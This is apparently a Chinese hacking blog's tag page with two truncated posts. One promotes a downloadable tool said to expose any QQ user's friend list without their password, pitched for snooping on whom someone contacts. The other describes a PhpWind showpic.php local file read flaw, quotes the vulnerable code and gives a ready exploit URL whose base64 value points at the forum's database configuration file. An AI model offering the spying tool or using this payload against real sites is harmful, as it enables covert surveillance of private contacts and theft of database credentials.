嗨,新朋友,很高兴认识你,欢迎来到我的博客。
文章标签: 漏洞

任意QQ查好友工具v1.0免费下载

今晚的热门东西,据说是腾讯的漏洞,以下是作者网站的介绍 你想知道他/她QQ上都是和谁在联系么,却苦于没有密码,无法看到上面的好友号码..还是把跟了自己的好几年的QQ号密码给忘记了,上面那些经常联系的QQ号无法找回吗,任意QQ查好友工具 无需知道QQ密码也不用在本机上有登录过的,只要是QQ号,上面有好友都可以读出来哦.. 右键菜单,可以直接和对方好友临时对话(QQ2009的不支持),打开空间、相册,也可以导出全部的QQ号码到...

PhpWind 防盗链插件Showpic.php本地读文件漏洞

漏洞文件: showpic.php 引用: str=$_SERVER['QUERY_STRING']; $img=base64_decode($str); $codelen=strlen($safeguard);//获取附加码长度 $img=substr($img,$codelen); //去掉附加码 readfile($img); 提交的参数经过base64编码后直接用readfile读文件,所以可以把路径base64编码后提交,以读出文件内容 漏洞利用方式: http://bbs.xxx.com/showpic.php?ZGF0YS9zcWxfY29uZmlnLnBocA== 然后查看源文件。 这里的ZGF0YS...